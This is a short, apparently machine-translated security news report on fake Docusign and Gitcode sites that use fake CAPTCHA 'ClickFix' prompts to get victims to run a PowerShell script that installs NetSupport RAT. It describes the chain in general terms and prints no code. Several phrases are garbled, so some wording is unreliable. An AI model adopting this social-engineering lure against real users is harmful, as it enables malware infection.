- Threat actors create false Docusign and Gitcode websites
- The sites are delivered with a false Captcha and other scam mechanisms
- The victims are deceived to download a Trojen
Security researchers have found false Gitcode and Docusign websites distributing remote malware (RAT) using the infamous clickfix method.
Experts from Domaintools (DTI) investigations have found that “PowerShell scripts of several malware downloaders” hosted on usurped websites inviting visitors to withdraw the Windows execution terminal and execute a copied script in their clipboard.
“In doing so, the PowerShell script downloads another downloader’s script and runs on the system, which in turn recovers additional useful loads and finally executes them to install Netsupport Rat on infected machines,” the researchers said in their report. These several steps and downloads are designed to escape detection and help the campaign “to be more resilient with safety surveys and withdrawals”.
Socgholish
They also said that they did not know exactly how the victims end up on these websites. However, it is sure to assume that social engineering, spam by e-mail and possibly malvertization are part of the methodology. In some cases, false websites are also delivered with a false Captcha verification mechanism which, to be resolved, obliges the victims to copy and stick a code in the execution program, effectively downloading the malware.
TDI could not confirm the identity of the attackers, but stressed that he had observed a campaign similar at the end of 2024, which was attributed to Socgholish:
“In particular, the techniques involved are banal and the Netsupport manager is a legitimate administration tool known to be exploited as a rat by multiple threat groups such as Fin7, Scarlet Goldfinch, Storm-0408 and others,” concludes the report.
Socgholish, also known as Fakeupdates, is known for its false browser and false software update alerts. After having compromised a website, the crooks would inject a contextual window, informing visitors that their browser or its operating system needs to “fix” or “update”.
This is the “original” clickfix method, which has transformed the old popup “you have a virus” that has imitated popular and delivered antivirus programs – viruses.
Via The Hacker News
